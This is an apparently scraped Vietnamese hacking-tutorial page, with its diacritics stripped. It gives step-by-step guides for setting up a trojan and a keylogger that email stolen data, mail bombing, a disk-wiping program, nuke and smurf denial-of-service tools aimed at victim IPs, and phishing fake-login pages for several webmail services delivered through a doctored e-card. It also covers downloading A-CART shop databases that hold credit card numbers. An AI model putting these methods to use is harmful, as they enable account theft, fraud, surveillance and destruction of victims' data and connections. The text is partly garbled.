hng dn sendmail nc danh vi Anonym Mailer 2.

0 hng dn s dng phn mm aiepr hng dn s dng trojan barok hng dn s dng phn mm revelation hng dn s dng keylogger 5.04 hng dn s dng bommail demo hng dn s dng chng trinh hdkp4 hng dn se dng cc chng trinh nuke hng dn s dng chng trinh ShowPass hng dn s dng chng trinh smurf2k hng dn s dng phn mm Stealther du IP hng dn hack tt c cc webmail bng fakelogin hng dn xi cng c Essential NetTools ly account cha hack credit card qua li acart2_0 hack credit card qua li SalesCart Database Storage Insecurity hack credit card qua li VP-ASP hack credit card qua li trong file shopper.cgi hack credit card ca Cart32 Sites mt bi vit v cvv2 hack server NT qua 1 s li c khai thc li hosting controller (HC) linux shell utils (by Microsoftvn)

exploit for the "unbreakable" oracle database (by Microsoftvn) hack 1 h thng CisCo linux (by Microsoftvn) t setup 1 cgiproxy ring cho minh s qua v tn cng t chi dch v tng hp cc lnh ca mIRC hng dn lm mt freedback form mt vi link Free Sub Domain And Hosting Th Vin Sch Welcome Vit Nam C bn Cron trn Unix ( by Vicki ) 3 bc kim tra Card Hng dn s dng NetCat Lm th no Spam ? ( by Vicki Group ) Bi vit tng hp v Hack ca Squall Leonahart Tm hiu v SQL Injection ( by Vicki Group ) Tm hiu v trn ngn xp trn Windows ( by Vicki Group ) Bi vit tho hip Vnexpress ca VKDT ( by Vicki Group ) Hack anon@FTP ( by Kha Administrator Vit Hacker ) Chy File t WebSite hay Email ( IE5.5, Win 2000 ) Hack IIS server vi bug unicode Format hard disk bng email Mask Link

Trojan chy ngay sau khi m email Hack Apache server vi bug phf , v mt s Bug khc Gi th nc danh, bomb th bng Telnet Xm nhp my tnh khi ang Online Hng dn Hack Local Site ( by Lukos ) Cross Site Scripting ( by Binhnx ) Hng dn Deface 1 Website Mt s phng php Hack Email ( by Staff of HVA ) Cc kiu tn cng hin i ca Hacker ( by Staff of HVA ) Nhng hiu bit c bn tr thnh Hacker ( by Staff of HVA )
Designer and Copyright

Hng Dn SendMail Nc Danh !

ok, tn chng trnh ny l Anonym Mailer 2.0, phng thc hot ng l s dng chnh server ca Anonym Mailer 2.0 lm cng vic vn d chng tt p g l " sendmail nc danh" ! ci ny rt nguy him nha......n lm cho 1 i ang yu nhau thnh gin nhau ! 2 ngi bn ang chi thn thnh onh nhau ! ni chung l mo mt vi n nu ngi nhn th khng bit g v blacknet ! download here ok, s dng phn mm ny v cng n gin, hy lm nh hnh di y v bn s thy n li hi th no !

ch : ch c dng th 30 ngy ! sau 30 ngy bn phi ng k, cc bn t tm crack hoc mua ly dng, c bit khi gii thiu phn mm ny mnh khng khuyn khch cc bn i ph hoi, nhng vi nhng k qu kh chu th khng n nang g c m gi email ca bn gi hn chi cho hn mt trn !! chc vui v

Phn Mm Aiepr
lm cch no kho IE : Download Here vo internet options

INCLUDEPICTURE "http://ptv5online.com/Hackofnew/aiepr/aiepr/huongdan/images/a.

gif" \* MERGEFORMATINET
vo tab content

click trn enable v chn nhng site cn kho, hoc c th kho bt k site hay website no bn khng mun ngi khc xi my ca bn c th vo c ( phn ny cc bn t tm hiu )

khi gp phi tr a ny ca 1 ngi no trn my tnh ca bn th tht l kh chu ! bn khng bit password vo web ! ch nh setup li windows hay gost li PC ca bn ch vi 1 tr a cn con ! tm cch gii quyt vy ! lm cch no ph password IE : download phn mm aiepr y sau khi unzip, setup cc bn vo program chy chng trnh

click vo icon cha kho enter seria

INCLUDEPICTURE "http://ptv5online.com/Hackofnew/aiepr/aiepr/huongdan/images/2.

jpg" \* MERGEFORMATINET
enter seria key ( c sn trong file .zip cc bn download )

INCLUDEPICTURE "http://ptv5online.com/Hackofnew/aiepr/aiepr/huongdan/images/3. jpg" \* MERGEFORMATINET

bo ng k thnh cng

*click vo biu tng nh hnh thc hin cc lnh v password ca IE

+delete password c ca IE ( ph password )

+g password mi v click change password nu bn mun change password c ( bn khng cn bit pw ny vn change c )

khi thay i thnh cng

+khi mum ly li password c

khi password c c ly thnh cng

*click trn biu tng nh hnh sau xem cc pw v thng tin cho php save trong my

mn hnh hin th

*cui cng l chc nng coi nhng password c save trong my khi bn click save khi login

thng tin thm: phn mm ny l sn phm ca hng Elcom, bn ny c mua sn cho bn. chc vui v
+++++++++++++++++++ anhlanonline@yahoo.com

Hng Dn S Dng Trojan Barok

trojan, backdoor,... c nhiu hacker vit nam s dng
t rt lu ri, khong cch y 4 nm, th nhng hin nay cn rt nhiu ngi cha bit cch xi, mc d l nhng trojan "c" v thng dng ! v vy xin vit bi ny vi mc ch hng dn nhng bn cha bit s dng con trojan barok. Download Here ( ch l trong qu trnh lm vic vi trojan cc bn phi disablen notron-antivirus i, v cc bn ng s b nhim v nu lm ng cch s khng sao ht, iu ny tng t nh a nghch vi mt qu lu n vy, bit th khng sao muh khng bit l.... t iu tiu !), sau khi unzip cc bn thy c tt c ba file nh sau :

click vo file setup setup cho server ca con trojan ny ( y cc bn lu mt cht l hu ht cc trojan c dung lng server rt nh v cilent th ln hn, do phn server s l phn gi i cho victim hoc nh km vo website cn phn cilent thng dng h tr cho server hoc xi iu khin ) :

sau khi click vo file setup cc bn chn file server v click Open nh hnh di :

y l mn hnh hin th ca barok sau khi open server : + cc bn chn tn file mun victim nhn thy sau khi ly nhim vo my tnh trong mc Filename, theo kinh nghim trong phn ny nn tn g v d nh system.exe hay ci g tng t victim khng dm shutdown khi trojan ang chy +trong phn Outgoing Mail Server (SMTP) v phn Destination Mail vit SMTP v email ca bn, lu rng SMTP khng nht thit phi l SMTP ca email, v ci ny vit SMTP no cng c min l h tr sendmail trojan send email ngc li, v iu ny c l cn bn thm 1 cht, v phn ny l quan trng nht, trojan hot ng c hay khng l do cu hnh phn ny tt : *SMTP g vo bt buc phi h tr sendmail m khng cn phi ng k

*cc bc test SMTP ca thng yahoo coi sao : mta469.mail.yahoo.com mta545.mail.yahoo.com *SMTP hi xa rt nhiu, h tr sendmail m khng cn phi ng k, cn by gi phi ng k mi c s dng dch v ny, cc bn tham kho v test SMTP bi vit hng dn s dng bommail demo

sau chn ch gi thng tin v bt c lc no victim online (Every Online) hoc c th chn s ngy gi thng tin v (Every ...day&up ) theo kinh nghim mnh khuyn cc bn nn chn s ngy, v nu chn box u th s phi nhn rt nhiu th ( mi khi victim online l 1 email m) ....tr khi qun l ngi iu th mi chn box Every Online.....heheh

sau khi cu hnh xong cho server ca barok bn click vo Save Server nh hnh trn, lc bn s nhn c mn hnh chc mng server save thnh cng nh sau :

tip sau click Exit thot khi cu hnh :

lc ny l ok ri , bn s phi s dng con server ( va c bn cu hnh ) send cho victim hoc gn n vo mt trang web no ri r victim vo chi ! ( phn gn server vo web ny mi cc bn c trn website trong nhng bi s dng cng c gn trojan vo web v s dng website ly trm account internet )

chc cc bn thnh cng v nghch vui v ! +++++++++++++++++++ anhlanonline@yahoo.com

Hng Dn S Dng Phn Mm Revelation

revelation l phn mm ly li password qun ( c m ho di dng *****) cc v d v chc nng ca phn mm ny:

+khi ng chng trnh ( sau khi download, unzip v setup) : Download Here

+soi pasword ca yahoo chat khi c ai "trt di " save password li !

+soi password ca pop mail tong outlook. u tin vo tool-->account :

sau vo tab mail, click vo account cn tm li pw v click propertes :

chn tab server v ko " ng nhm" ca revelation vo password m ho dng **** , vbn s thy password trn dng status ca revelation ( pw trong v d ny l "bimat!") :

+phn mm ny cng soi c password trong yahoomail login :

hay trong hotmail login cng vy :

+nhng thng tin thm : revelation khng lm vic trn

windows XP ( v windows XP s dng m ho 128bit ), y l phn mm free ! cc bn c th gh thm website chnh ca n ti : http://www.snadboy.com

S Dng Keylogger 5.04

*Bi vit vi mc ch hc tp. mnh khng khuyn khch cc bn i ph hoi v hon ton khng chu trch nhim vi bi vit ca mnh. Cho cc bn, hm nay mnh xin gii thiu n cc bn 1 cng c rt hay v kh n tng, l keylogger...Ti sao li n tng. L bi v n cho php ngi dng kim sot ton b bn phm ca 1 my tnh d rng khng cn ngi my tnh ...... Ok! chng ta bt u tm hiu. Download Here bc 1 Ver 5.04.zip trong bi ny dnh cho tt c cc phin bn windows.Trong c sn file register l key ng k c th s dng ht cc chc nng ca keylogger bc 2

Sau khi dowload keylogger v, cc bn double-click ln biu tng keylogger , sau khi c ca s nh trn, cc bn tip tc click vo Etract setup. bc 2

Sau khi setup xong cc bn vo th mc v setup keylogger double-click vo biu tng bn phm cu hnh cho keylogger, ti box " Longin Engine Status " cc bn click vo start bt u cho keylogger hot ngcheck vo autostart cho keylogger t ng lm vic khi window khi ng.Coi hnh di.

Ti box " logfile Configuration " nu mun thay i ng dn m keylogger cc bn click vo " change.." thay i cho hp mnh, th mc mc nh l th mc cha b setup keylogger ca cc bn ( phn ny khng cn lm nu bn khng mun change ng dn cha d liu ca keylogger

bc 3 ti box cc ban mun keylogger chp hnh hin th ca my tnh bao nhiu pht 1 ln , check s pht m bn mun vo box.Mc nh l 10 pht 1 ln, s pht nh nht c th c l 1 pht.

bc 4

Cu hnh keylogger gi email v cho cc bn. u tin g email ca bn trong box " send To " , cn box Sender's eMail nguyn, box " SMTP Host " cc bn g SMTP server ca server email cc bn vo v chn s thi gian keylogger send email trong box " Send file every " mc nh l 30 pht, cn c th thay i tu theo thch ca bn. bc 5

Set password cho keylogger ca bn khi b ngi khc xm nhp bng cch check vo box " Password Protection " sau chn password ca bn. Crack cho keylogger: cc ban crack vi Username: vicki v Key: LGvFzeX= crack ny c trong file crack cc bn dowload ban u.Coi hnh.

Ok! , n y l xong ri !, nu mun coi bn phm g nhng g bn vo th mc cha keylogger ckick vo biu tng bn phm sau ckick vo view v chn file cc bn mc nh coi

ckick next coi v d nhng g m keylogger ly c t bn phm Chc cc bn thnh cng.Cc bn c th tham kho thm ti http://www.keylogger.de

S Dng MailDemo Bommail

cc bn i ph hoi v hon ton khng chu trch nhim vi bi vit ca mnh. bc 1 Sau khi unzip v chy chng trnh ta s thy giao din ca chng trnh nh sau Download Here

*Bi vit vi mc ch hc tp. mnh khng khuyn khch

bc 2

Chn server dng bommail trong nh trn.Sof ny c 2 server cho bn chn.Nu bn thch nh km file khi bommail bn lm nh hnh sau:

sau chn file v attach vo bc 3

nh s lng mail mun bom vo v in cc thng tin cn thit. Ta s c 1 giao din ging nh hnh trn bc 4 click vo connect :

bc 5

Click vo nt play bt u bommail bc 6 S l s c khi send bom c vn . Khi c thng bo khng th connect to server. Chn mt server khc .Thng bo li nh sau:

Lc c ngi l chng trnh cha connect vo oc server bommail. Bn cn 1 server khc h tr vic gi mail connect

bn c th ly server ti y phc v cho cng vic ca mnh Sau cng click Play bommail. Chc cc bn thnh cng !

+++++++++++++++++++ anhlanonline@yahoo.com

Windows,Hard Drive Killer

okies ! hm nay mnh s gii thiu n cc bn 1 vi phn mm v cng nguy him ! ch cn 1 click chut l cng ca bn tiu ngay lp tc ! ch : ch c, nu thc hnh ngay trn my bn, 99% cng ca bn s hng ! khng khuyn khch i ph hoi ! u tin cc bn download chng trnh c tn hdkp4 ti y. y l sn phm ca website http://www.hackology.com sau khi unzip cc bn thy tt c c 5 file, okies:

cng vic " ph hoi" cc k n gin ch bng 2 click chut vo file hdkp.exe nh hnh trn l........ cng ca bn s cht ngay trong ln sau khi ng my! ch c di m thc hnh ngay, tr khi bn mun thay cng mi, cn nu khng, k thut phc hi cng sau khi dnh con ny cha c vit nam ! gii thch qu trnh lm hng cng: ngay sau khi click vo file, chng trnh s bt u ph hoi tt c data trn cng ca bn, mc d cho bn c dng chng trnh gia chng th vn th ! trong ln sau khi ng my tnh chng trnh s t ng tip tc chy ! chng trnh ny hot ng nh vo thay i nhng thng tin trong file .bat vn rt quan trng trong windows ! n s ph cc track t cng v bn kh m c th phc hi li

d liu hay lm g vi cng bn c, sau khi chy chng trnh cng ca bn coi nh l cc st ! khng lm g c ngoi cch vt vo st rc ! ch : chng trnh ny khng lm vic trn nhng cng dng MACS ! Ngoi ra, mnh cn c 1 vi phn mm khc mun...chia s vi cc bn, tnh cht cng l ph hoi y nh th, hdd v windows , nhng vi mc nh hn cc bn c th dowload format winkill winkill32 +++++++++++++++++++ anhlanonline@yahoo.com

S Dng Nuke
*Bi vit vi mc ch hc tp. mnh khng khuyn khch cc bn i ph hoi v hon ton khng chu trch nhim vi bi vit ca mnh.

NuKe rt li hi. Li hi ch no? l nu ta bit c 1

a ch ip ca mt my tnh bt k (my tnh quay s vo mng bng modem v tt nhin ip ca n do th s l ip ng.) Th ta hon ton c th cho ip disconnect , cho d ip l ip ca c 1 mng LAN hay ip ca mt my n ngi dng thng thng.Trong bi hng dn ny khng i su, m ch nu cc xc nh 1 ip thng qua 1 s con ng v ni c th tm thy phn mm nuke li hi ny, cng nh cch s dng chng. Xc nh a Ch IP Ca Mt Ngi: C nhiu cch xc nh a ch ip, Cc bn chat trong iRMC c nhng cch rt hay ( nhng rt tic mnh khng chat trong nn khng bit :) )

Cn cc bn admin ca site no c th thy ip ca member khi h port bi. cng c th dng phn mm xc nh a ch ip ca 1 ngi bn quan h.... y mnh gii thiu 1 cch xc nh a ch ip ca 1 ngi qua chat Aol , ICQ, MSN, hoc Yahoo..... bc 1

Nu bn dng Window Xp bn vo start -->run-->g cmd nh trn hnh ri click ok Nu bn xi nhng h iu hnh Window khc c th vo start-->run-->nh lnh command nh hnh di , sau cng click ok

bc 2

Khi c 1 hp thoi hin ra, bn tm dng C:\Documents and settings\tn s dng> v g netstat -an nh hnh trn.Khi a ch ip ca my cc bn s nm pha bn tri ca s hin th . Cn nhng a ch ip cc bn c kt ni n s hin pha bn phi ca s nh hnh sau y:

Trn hnh a ch ip ca mnh nm pha bn tri ngi l 203.162.19.222 . Nhng a ch ip mnh c kt ni n nm pha bn phi . l cc ip: 202.156.156.168 ; 216.136.233.138 ;194.19.127.21 ....... Nu bn chat ca cc bn vitnam th a ch ip s bt u l 203.162... do ch cn tm nhng a ch ip bt u vi 203.162.... nh hnh trn, mnh ang chat vi 1 ngi qua yahoo , vit nam-->ip ca ngi l 203.162.7.221 ....OK? Nu hiu cc bn click next .

bc 3 NUKE ! C rt nhiu chng trnh nuke, y mnh xin hng dn 1 trnh c bn tn l Assault Mn hnh hin th ca Assult nh hnh di y:

Cc bn g ip cn nuke vo khung "Host" trong khung "port " l cng cc bn mun bomber .Thng thng l 139,113,11,119,80 nhng b khc nguyn v click ICM ECHO di y l ca s hin th ca Assault khi chy, trong v d ny mnh ang bom port 80 tc l cng duyt word wide web. c thm chi tit cc bn click here c th bit r hn v Port Number v Service.

Sau khi chy c 1/2 s packs m bo victim disconnet

khi mng. h h h. Cch duy nht l reconnect Click next dowload cc chng trnh nuke.

DOWLOAD NUKE di y l mt s hnh minh ho nhng chng trnh nuke m mnh c: (cc bn c th download chng y )

nhiu hn na: expgen085 ; udp2 ; udp5......... +++++++++++++++++++ anhlanonline@yahoo.com

Phn Mm ShowPass
mnh xin gii thiu n cc bn phn mm ShowPass +h iu hnh p dng: windows 95,98,98se,Me ( khng dng c vi windows 2000 tr ln ) +chc nng: tm li username v password connect vo internet khi l qun hay b mt ( m save vo my ) +ng dng : khi qun, mt, hoc xi n trm account t my ang ngi +cch dng: sau khi unzip, click vo file showpass chy chng trnh, sau click nt "DIALUPs" tm li hay n trm account +homepage ca phn mm ny http://www.xcoder.com +++++++++++++++++++ anhlanonline@yahoo.com

hng dn s dng smurf2k

u tin cc bn download chng trnh ny ti y sau khi unzip , thy 2 file broadcast.txt v Smurf2K.exe click vo file Smurf2K.exe nhn thy giao din nh sau :

trong nhng bi trc, cc bn c hc lm th no tm ip ca 1 ngi ang online hoc 1 website ok , by gi vic n gin i n ch l bn g IP ca nn nhn vo box victim, ri click smuf :

trong hnh trn mnh v d IP ca nn nhn l 203.162.24.12 gi mnh s ni tip cng c ny hot ng nh th no: trc ht mc ch ca cng c ny l send cc gi d liu n website hoc my tnh ca nn nhn, nhm mc ch bt my tnh ca nn nhn hoc website phi send tr li 1 gi d liu, chuyn ny l rt bnh thng, nhng do send qu nhiu n website hay PC , do website hay PC s bi treo tm thi, cng c ny s dng rt nhiu IP ( c trong list ca file broadcast.txt )
vo mc ch trn:

cc bn c th mang supperscan ln mng qut ip ang online thm vo list ny nhng IP mi nhm mc ch cho cuc tn cng din ra thun li, cng nhiu IP cng tt ! chc vui v ! +++++++++++++++++++ anhlanonline@yahoo.com

HNG DN S DNG PHM MM

Stealther
Download

Gii thiu : Stealther l mt phn mm kt hp vi trnh duyt IE gip bn m bo s "nc danh" khi duyt web vo download files,Stealther gip bn che giu IP tht ca mnh khi gh thm cc website, chn cc Cookie nguy him v m bo s bo mt cho thng tin t my tnh ca bn khi cc website "tnh bo". Stealther bo v mc ti a quyn c nhn ca bn khi lt web, Stealther lun lun t ng cp nht nhng anonymous proxy v kim tra kh nng "nc danh" ca cc proxy .... Ni tm li Stealther l mt phn mm tuyt vi i vi nhng ngi mun an ton khi ln mng. Hn dn s dng : Ci t : Sau khi download bn chy file stealther_setup.exe bt u qu trnh ci t:

Khi chy file stealther_setup.exe s c mt thng bo nh hnh trn yu cu la chn ngn ng ci t, bn chn mc nh l English (UK)

Sau bn lm theo cc hng dn trong qu trnh ci t sau khi ci t xong bn chn 1 trong 2 la chn. 1 l khi ng li windows, 2 l khi ng sau, tip tc qu trnh.

Kt thc qu trnh ci t bn cn phi Crack phn mm s dng c ht

tt c cc chc nng ca n Crack: crack chng trnh bn cn download bn crack y Trc khi crack bn cn phi close chng trnh li, unzip file va download v copy file crack.exe vo cng th mc va ci t Stealther mc nh l C:\Program Files\Stealther.

Chy file crack.exe, qu trnh crack thnh cng bn s nhn c thng bo :

Nhng bn ng tng n y l crack c v c th s dng c ht chc nng ca n nghe :) kh kh

Tip theo bn chy Stealther s xut hin mt biu tng nho nh trong system tray Dubble Click hoc Click phi chut chn Show

windows. Vo menu File --> Unlock Trial Version

Nhp tn bn ( g lin ) ri nhn Unlocknow!, Unlock thnh cng bn s nhn c thng bo

Ok crack xong ri by gi n cch thit lp c th "nc danh" khi lt web. connect hoc s dng Thit lp cu hnh cho IE bn vo Internet option -> Connections --> chn Connection s "nc danh" (connection m bn ang connect nu bn thit lp cho mt connection m connect bng connection khc th s khng c tc dng g ht) --> Settings

Tip theo bn chn Use a proxy server ri chn Advanced..

Nhp vo mc HTTP : Proxy address to use : 127.0.0.1 Port 14000 --> OK th l xong tit mc thit lp thng s cho IE gi n tit mc thit lp cho Stealther.

Thit lp cho Stealther cng n gin nh thit lp cho IE thi. Show windows m ca s chnh ca chng trnh, trong ca s chnh bn c 3 la chn trong mc Change Surfing Mode to la chn mode "nc dnh" theo ti la chn tt nht l la chn th 2 Strealth Mode.

Tip na bn vo menu Proxy-engine --> View/Edit/Check xem proxy list. Bn c th thm, sa, xo, check proxy s dng.

 thm 1 proxy vo list bn vo munu Edit --> Add new proxy entry

Nhp proxy nh hnh trn ri nhn Apply, ban cng c th Add nhiu proxy

mt lc vo list bng cch copy v paste

c th c nhiu proxy thm vo list bn c th ly y, bn copy v paste vo proxy list. kim tra proxy bn vo menu Check --> Check All hoc Check Selected.

Mt proxy tt th s c mc Working l yes nu proxy no c kh nng "nc danh" th mc Anonymos l Yes. Bn c cng nhiu proxy nh vy th cng tt. Khi xong xui nhng bc trn, kim tra xem thnh qu ca cc qu trnh bn thc hin, bn vo y check xem proxy by gi ca bn th no. Ok. ht! Chc bn thnh cng!

Hng Dn Hack Tt C Cc Webmail

(dnh tng Nguyn Phng Anh ) tr ny thc ra c t rt lu ri, website anhlan cng vit bi hng dn chi tit ngay t nhng ngy u, khi m con s ngi bit v tr ny vit nam cn rt t, do site anhlan.com dow nn data b mt, mnh ngh rng ai cng bit tr ny, h, nhng thy c nhiu ngi hi qu nn hm

nay cho php mnh c post li bi ny vi mc chi tit nht c th , bi vit ny xin dnh tng bn gi ca mnh: Nguyn Phng Anh (YM: tinh_yeu_tre_con ) ok, let's go ! chng ta cng bt u !

To SoucreCode Ring Cho Bn

ti sao mnh li ni th? trong bi vit ny bn s hc cch ly trm password email ca tt c cc webmail ! v d nh @ttvnonline.com, fastmail.ca , @hn.vnn.vn, @fptnet.com ...ch khng phi ch ring yahoo hay hotmail , v vy trong bc 1 ny mnh mun hng dn cch c mt ci soucre s dng sau ny. bc 1: cc bn vo http://www.bravenet.com sau g email ca cc bn ( email webmail no cng c, v d nh tenban@yahoo.com hay tenban@hotmail.com hay tenban@ttvnonline.com u c, min l bn s hu hm mail -v y l hm mail cc bn s nhn password ca victim sau ny ! ) vo box nh trong hnh ri click join :

bc 2: checkmail ti email m bn va enter ( ca mnh phi check hm mail alonedrinkwine@msn.com cn cc bn s check hm mail ca cc bn xi ng k )

click vo link m bravenet va a cho nh hnh di y :

sau khi click s c mt ca s ng k account cc bn ng k mt account trong trang ny, y l mu ng k ca mnh, cn cc bn t chn, xin ni qua l phn ny khng quan trngv khng phi ghi chnh xc thng tin ca bn !

iu quan trng nht trong phn ny l box "website URL" .Ti box ny bn hy enter a ch m bn mun victim nhn thy sau khi click vo form fakelogin ca cc bn, trong v d ny mnh chn site riversongs.com -l mt site v ecard :

sau khi click register nh hnh v bn s thy 1 trang tip theo, khng cn lm g c ngoi click vo continue nh hnh :

sau khi click nh trn s c 1 trang mi hin ra vi li cho mng ng k thnh cng nh hnh di :

okies, gi bn tm box login nh hnh di y , sau g user v password ca bn vo ( va ng k vi bravenet ) ri click Login

sau khi login c vo bn tm mc Email Forms nh hnh di y v click vo:

click vo ri s nhn thy mt on m lng nhng nh hnh di ! cc bn ch coppy tht chnh xc on bt u t <form action=......cho n...... value="1" /> nh hnh di y:

okies, ghi nh ly on m ny vo bt c u nh word hay notepad s dng cho sau ny , n l ca ring bn !

gi click next qua trang 2 vi cch s dng soucre ny n trm pw email ca cc webmail. sau khi c on soucrecode ca ring bn ri,save n li ri, bn bt u hc cch hack password ca mt vi webmail thng dng, sau lm tng t cho bt k webmail no khc m bn bit !

Hack Password YahooMail

sau khi vo trang http://mail.yahoo.com bn click chut phi vo mt khong trng bt k, chn View Soucre nh hnh di :

tm th <head> , th ny ngay u tin sau th <html> cc bn paste on code lc ny vo ngay di th ny nh hnh di :

sau khi paste vo, bn vo menu file, chn Save As nh hnh :

trong ca s Save As ny phn save as type chn l All Files nh hnh bn :

sau g File name l yahoo.htm ( hay login.htm tu bn min l c .htm ng sau !)

sau khi save file ny li di dng .htm, bn view upload chng ln website no ri th login qua , sau checkmail ti email bn ng k lc u, s thy nh th ny :

v y l phn password ( test v test] )

th l xong ! bn c th coi bn demo ti y

Hack Password Hotmail

lm tng t nh vi yahoomail, u tin bn vo http://hotmail.com sau view soucre nh hnh di :

cng paste on soucre m mnh bo cc bn save vo trang trc vo sau th <head> tng t nh lm vi yahoo mail :

sau cng lm tng t yahoo ri save li di dng .htm nh hnh di, sau upload ln website ca cc bn ri g victim vo chi ! coi demo ti y

Hack Mail.vnn.vn
u tin vo http://mail.vnn.vn cng view soucre v paste sau th <head> ri save di dng file .htm :

coi demo ti y

Hack @ttvnonline.com
u tin cng vo website http://ttvnonline.com chn email ri view soucre :

cng paste on code ring ca cc bn sau th <head> :

save lai di dng .htm ri lm nh yahoo hoc hotmail, nhng khi click vo th khng thy ci lgo ca ttvnonline

u ! nh hnh di , nu khng c chc chn victim s ngi ng rt nhiu !

v vy bn hy vo save ci logo ca n hoc coi ng dnca ci logo ny ri edit file c on soucre ca cc bn bng front page hay notepad, iu ny rt d lm v c hng dn c th site http://vtv4online.com ( trong ny cng c hng dn cch thc ng k mt website free v cch upload file ln host dnh cho nhng bn mi bt u )

coi demo ti y

okies, nh vy s qua mnh hng dn cc bn ly trm pw email ca 4 webmail kh thng dng, tng t nh th bn s em i lm vi cc webmail khc m bn bit! nu bn lm xong vic upload nhng page .htm c sa i ln host ca bn, hy click qua page3 coi cch lm 1 thip in t la victim ! sau khi bit lm fake login ca cc webmail v r victim vo "chi" n trm pw ca h thnh cng ri, th t nhin c mt iu ny sinh ! l chng nh mi ln mun n trm pw ca ai ( v du: victim@ttvnonline.com ) th li phi chat vi victim hay send email g n vo page lm sn trn host ca mnh ! v l d ny mnh hng dn tip cc bn cch ch cn gi 1 ecard n hm th ca victim nh nhng ecard bnh thng nhng la victim vo page lm sn ca ta ! cch lm : vao mt trang ecard bt k, send 1 ci bt k v hm th ca chnh bn,v d mnh c mt ci th ny : Your friend anh lan found a site that they thought you'd like. Check it out: http://www.riversongs.net/Flash/you.html

This free tell-a-friend service is made possible by our sponsors: *~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~* **RIVERSONGS BEARY MERRY CHRISTMAS** http://www.riversongs.com/Flash/bmas.html *~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*

=================================================== == YOURE A WINNER!! No Scams, No Kidding- Everything Is FREE!! School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set, Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones, Weight Watchers Software, Scooby Doo Gifts, Curious George Watches, and Biker Sunglasses, all yours for FREE!! Dont miss out on other FREE gifts like, a Bart Simpson Lunch Box, Batman Comic Books, James Dean glasses, and MORE!! All gifts are FREE!! Dont Miss Out, Click Here While Theres Still Time: http://www.supertaf.com/adt.php?a=7608461 =================================================== == =================================================== = NEED A CAR - New or Used? http://www.supertaf.com/adt.php?a=7608460 Good or Problem Credit - eCarCredit will can get your car and the loan you deserve. Thousands of people across the country have purchased cars and received auto loans with eCarCredit's help through our NATIONWIDE NETWORK of auto dealers & lenders. Don't have perfect credit? You can get a car loan with our FREE 2

minute application! Plus our Loan Advisors HELP YOU FIND A CAR that fits your needs from a local dealer at no extra cost. Click here for your new car TODAY! http://www.supertaf.com/adt.php?a=7608460 *Must be over 18, & approved for credit. Not available in TX, AL, AK, AR, HI. Offer subject to change without notice. Copyright 2002 eCarCredit.com =================================================== =

--------------------------------------------------------------------You received this email because someone visited our site and wanted to tell you about it. To answer, simply reply to this message. Click here if you don't want to be reached through our service: http://supertaf.com/optout.php?email=admin()anhlan; ;us Report Abuse: http://supertaf.com/index.php?page=abuse Got a question? http://supertaf.com/index.php?page=faq Sender's IP address: 203.162.132.168 --------------------------------------------------------------------gi sa thnh th ny (dng notepad hay front page edit link nhn ecard thnh link dn ti page fakelogin ca cc bn -

tu theo victim c email th no m link n page sn fake ph hp ): Your friend anh lan found a site that they thought you'd like. Check it out: http://www.riversongs.net/Flash/you.html

This free tell-a-friend service is made possible by our sponsors: *~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~* **RIVERSONGS BEARY MERRY CHRISTMAS** http://www.riversongs.com/Flash/bmas.html *~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*

=================================================== == YOURE A WINNER!! No Scams, No Kidding- Everything Is FREE!! School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set, Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones, Weight Watchers Software, Scooby Doo Gifts, Curious George Watches, and Biker Sunglasses, all yours for FREE!! Dont miss out on other FREE gifts like, a Bart Simpson Lunch Box, Batman Comic Books, James Dean glasses, and MORE!! All gifts are FREE!! Dont Miss Out, Click Here While Theres Still Time:

http://www.supertaf.com/adt.php?a=7608461 =================================================== == =================================================== = NEED A CAR - New or Used? http://www.supertaf.com/adt.php?a=7608460 Good or Problem Credit - eCarCredit will can get your car and the loan you deserve. Thousands of people across the country have purchased cars and received auto loans with eCarCredit's help through our NATIONWIDE NETWORK of auto dealers & lenders. Don't have perfect credit? You can get a car loan with our FREE 2 minute application! Plus our Loan Advisors HELP YOU FIND A CAR that fits your needs from a local dealer at no extra cost. Click here for your new car TODAY! http://www.supertaf.com/adt.php?a=7608460 *Must be over 18, & approved for credit. Not available in TX, AL, AK, AR, HI. Offer subject to change without notice. Copyright 2002 eCarCredit.com =================================================== =

--------------------------------------------------------------------You received this email because someone visited our site and wanted to tell you about it. To answer, simply reply to this message. Click here if you don't want to be reached through our service: http://supertaf.com/optout.php?email=admin()anhlan; ;us Report Abuse: http://supertaf.com/index.php?page=abuse Got a question? http://supertaf.com/index.php?page=faq Sender's IP address: 203.162.132.168 --------------------------------------------------------------------sau khi edit nh trn, send email ny n email ca victim, victim khi m mail, nhn card s thy mn hnh fakelogin v nhp user cng nh password vo v th l bn ch cn checkmail ly pw send v ! chc cc bn hack vui v +++++++++++++++++++ anhlanonline@yahoo.com

Hacking Credit Card

( qua li ca A-CART shopping ) A-CART l mt ASP shopping card (ng dng t VBScript) c kt hp t mt s hm ca VBScript v Access database

l hng bo mt c pht hin bi nick hx ngy 05/09/02 cho php bn c th download file database trong nhng website dng shopping A-CARD m khng cn phi c bt c mt quyn hn g trn website ! chong tht ! nhng thng tin trong file database rt quan trng, n c th cha nhiu thng tin nh : name, surname, address, email, credit card number, and user's login-password.... ok, by gi chng ta cng thc hnh li ny : u tin cc bn vo http://google.com ( cc bn c th vo cc site tm kim khc nh http://av.com .... ) search keyword "acart2_0" :

ok, by gi bn thy rt nhiu site b mc li ny:

do kinh nghim mnh khuyn cc bn nn chn nhng site c dng http://url/acart2_0/ v d site http://www.coolrob.com/cart/acart2_0 okies, cc bn c tin rng mnh ownload c file mdb ca n khng? khng tin ? th g thm /acart2_0.mdb vo ng sau url trn nh hnh di coi !

ngay khi click go! cc bn thy xut hin thng bo save hoc open file mdb ny ! thnh cng ri !

nhn mn hnh download mi thch th lm sao !

cng vic cn li l c file acart2_0.mdb ny! vic ny dnh cho cc bn tng t cho nhng site b li ny, cc bn cn ch g na m khng khm ph !

chc hack vui ve ! +++++++++++++++++++ anhlanonline@yahoo.com

Hacking Credit Card

